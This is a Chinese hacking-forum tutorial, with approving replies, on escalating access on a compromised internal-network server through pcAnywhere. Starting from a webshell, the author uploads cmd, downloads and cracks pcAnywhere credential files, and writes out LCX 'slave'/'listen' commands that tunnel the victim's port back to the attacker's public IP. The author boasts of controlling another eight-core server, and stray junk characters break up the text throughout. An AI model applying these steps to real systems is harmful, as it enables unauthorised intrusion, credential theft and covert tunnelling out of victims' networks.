返回列表 发帖

[原创文章] pcanywhere之内网提权

很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。" \# _, I0 H4 S3 ?+ v: i$ E5 Y/ I

6 l) w9 X% @- i$ {提权方法:pcanywhere+LCX: p  _2 V& f1 _0 K* c8 t# F' H5 a

4 K$ {- g0 X( N获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。* y! V% ]$ L/ ]7 U& ^6 D( M6 r* C

) ?! y+ p1 I& s0 h2 H% H在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。( A: l  @5 l* X* j
% E4 d' j9 |9 U# ?9 }5 m8 h

! e" {, |/ j3 W! S# {# T; y查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
: g2 Y& G+ \- o2 {8 M% b; k# X& H8 K8 j7 ?) e6 D% M: D% W

" j% J% c& O: E( K呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。8 \7 K, `# q+ |* |

; ~+ v; t* F0 i7 ~' o9 C/ S0 t/ I: H- |8 ?
- Y7 v3 M& y, i" C
, h$ _' i, Z& N" u, y. z
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
4 Z+ @1 C3 z9 M
$ ]6 K& n1 S- ]: B' |8 K5 C
' W- x9 ^* T( OLCX的用法再简单说下:
, H2 [& n- f5 g
5 x- {5 I  S2 P7 p服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
: i! P5 K3 g5 j/ a; a
& d6 [  U$ G3 K. f6 O  b; ?3 J( l2 C本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
. I0 m  [. F: L! K+ \! F  H  w5 |
0 u( J3 F5 M; L! P: W, ^1 h由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。& N( X8 v3 y4 q0 s" T, Z/ ^, q
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``6 f! n0 D1 A! L1 e( N
' T/ q, o& ?7 j7 N4 c

4 i9 `# c# }5 p7 ]9 L
/ s( e; y8 K- {2 a* b- u) f- m, d* i5 e+ b# R3 }
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。/ C6 r% a9 n4 x, ^7 \6 Z
; y2 J1 m: e' i8 T' j+ a9 c

0 X( {/ F. U1 O8 L( o  \
- S" |1 D, F# c6 ?  v/ Y4 p$ g+ J2 C" F0 L6 z
我们本地连接试试,输入我们刚破解的账号密码, A' Y$ C. n3 G/ C

9 J  z& q) q0 G4 l
+ A: B9 _2 [. [$ l呵呵``连接成功,服务器不错,又一个8核^︵^# d% w. W2 R! M+ H0 i/ a9 }1 b

9 N  O; S9 x- H, C2 J* A% F5 q0 U- T, R8 t) T* u0 d4 D

' H) L$ ~7 p+ V/ g4 a2 v0 ]
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
1

评分人数

  • 柔肠寸断

不错不错。。。你的貌似一直都是内网服务器哈
希望做站长本人的学生请点击
http://www.3ast.com/viewthread.php?tid=13841
QQ790653916只负责SEO以及收费教学等方面联系,他人勿扰

于智者同行,你会不同凡响;与高人为伍,你会登上巅峰

TOP

哎。。。。运气不佳```老碰见内网的。。。。

TOP

八核的哟

TOP

顶起。。。。。。。。。
希望做站长本人的学生请点击
http://www.3ast.com/viewthread.php?tid=13841
QQ790653916只负责SEO以及收费教学等方面联系,他人勿扰

于智者同行,你会不同凡响;与高人为伍,你会登上巅峰

TOP

但是我反弹后连接总是不成功,试着转发5632,5631一起,还是不行.

TOP

返回列表